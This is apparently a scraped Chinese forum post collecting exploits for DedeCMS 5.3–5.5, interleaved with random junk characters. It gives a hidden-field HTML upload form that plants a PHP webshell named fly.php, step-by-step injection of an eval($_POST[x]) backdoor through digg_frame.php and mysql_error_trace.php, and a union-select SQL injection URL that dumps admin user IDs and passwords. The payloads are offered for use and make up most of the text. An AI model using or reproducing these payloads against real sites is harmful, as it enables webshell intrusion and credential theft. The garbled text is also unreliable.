<input type='hidden' name='cfg_basedir' value='../../' />
8 x9 W9 `' X( q+ n# f/ ~3 A/ i<input type='hidden' name='cfg_imgtype' value='php' />
; ?1 Y+ z' V% T$ T<input type='hidden' name='cfg_not_allowall' value='txt' />% Y R* H# C$ @3 l6 `
<input type='hidden' name='cfg_softtype' value='php' />6 D7 V2 g2 ?' R( W- n; ?
<input type='hidden' name='cfg_mediatype' value='php' />4 [1 }/ G- q) ? o9 h4 ^
<input type='hidden' name='f' value='form1.enclosure' />
! H! r; _2 W3 d$ j5 {7 g" F2 |+ x<input type='hidden' name='job' value='upload' />1 z. H) q3 B, m% D7 K: F6 U3 j; [
<input type='hidden' name='newname' value='fly.php' />( b) A% R8 Z6 l- k! r( @
Select U Shell <input type='file' name='uploadfile' size='25' />* n+ `8 ^; ~) r* Z' y5 j
<input type='submit' name='sb1' value='确定' />
8 [( v+ U9 Q9 ^2 \% a! }, M' H</form>9 u: \' z# A8 D T; S! X' F
<br />It's just a exp for the bug of Dedecms V55...<br />
# E& @* v: b8 M5 CNeed register_globals = on...<br />
( O. Q* L8 f5 @- g) iFun the game,get a webshell at /data/cache/fly.php...<br />
2 L+ P* U c6 Z( A</body>' ]. s0 g* @1 @+ R
</html>! x5 k, a5 z+ j) S, s- f6 v
! n* ^ Y- Q) t" ?) Q& L' C! w0 u3 ], V- v& `2 T8 a
7 \2 t$ ]( y2 u4 q3 ?' z4 s# e5 r3 Q8 _% h7 s% g6 b
) h( E \7 b% Q) c! S1 q0 l4 |" H/ Y/ i f A" |
* L7 T0 k* E( A3 w* m' j# J# a m) T W q
% N! g/ q# E! O8 \" f
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
+ Z( E7 c R( g0 E- p' m. [1. 访问网址:5 t1 i" P- U1 g% d$ ]
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
( G9 u9 A7 G5 a* q, v& D8 e5 V可看见错误信息
4 w2 h( t% e' g% `4 ~, d
8 e& K- \: ]$ I2 [! m# o% O# {9 M2 c2 C
/ h1 x* d" M0 j$ u2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。- l+ q! T. j8 E( I! b" [+ b$ j T
int(3) Error: Illegal double '1024e1024' value found during parsing6 i. L) D% f( R1 O# }! f
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?># s0 e* s2 E S+ i1 ` [) u6 ^0 L
, a& }! A1 S6 i/ I+ X
# l; K: S/ r( g1 O h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是; `2 s+ M" Q* v1 S$ F( o
" m4 ^7 ]: v+ @ ]2 S/ y$ L
9 R/ F) k5 T3 P" T; _$ A$ K<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>. z8 D' H p: S8 {. [: `
3 S: b2 X7 M. @1 A& w2 r4 } q9 H3 p4 Z% L; z6 g+ u' O
按确定后的看到第2步骤的信息表示文件木马上传成功.4 F7 P. F3 V5 u
: Y0 ]. [- P1 l' z9 q( `
, z, i% s/ D. ~( l8 {0 X+ Q$ `& e8 M/ ?7 l! ^3 J/ p8 B
: V0 n3 A# |9 a* E7 D
& p3 @, K) ^/ Y5 q! M8 m
5 m1 l" T6 n( H( f- a- I. j2 {" l2 J, c' S
; ] R/ B* Z2 G6 B* ?
* \$ t; N( r. v# ^/ M! s6 R
3 z: G9 _7 Z. E4 C9 f
) B. H+ J3 C' s, v+ {' ?# z! A# d8 z% B: x8 T6 z& w7 W) b3 j/ Z
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|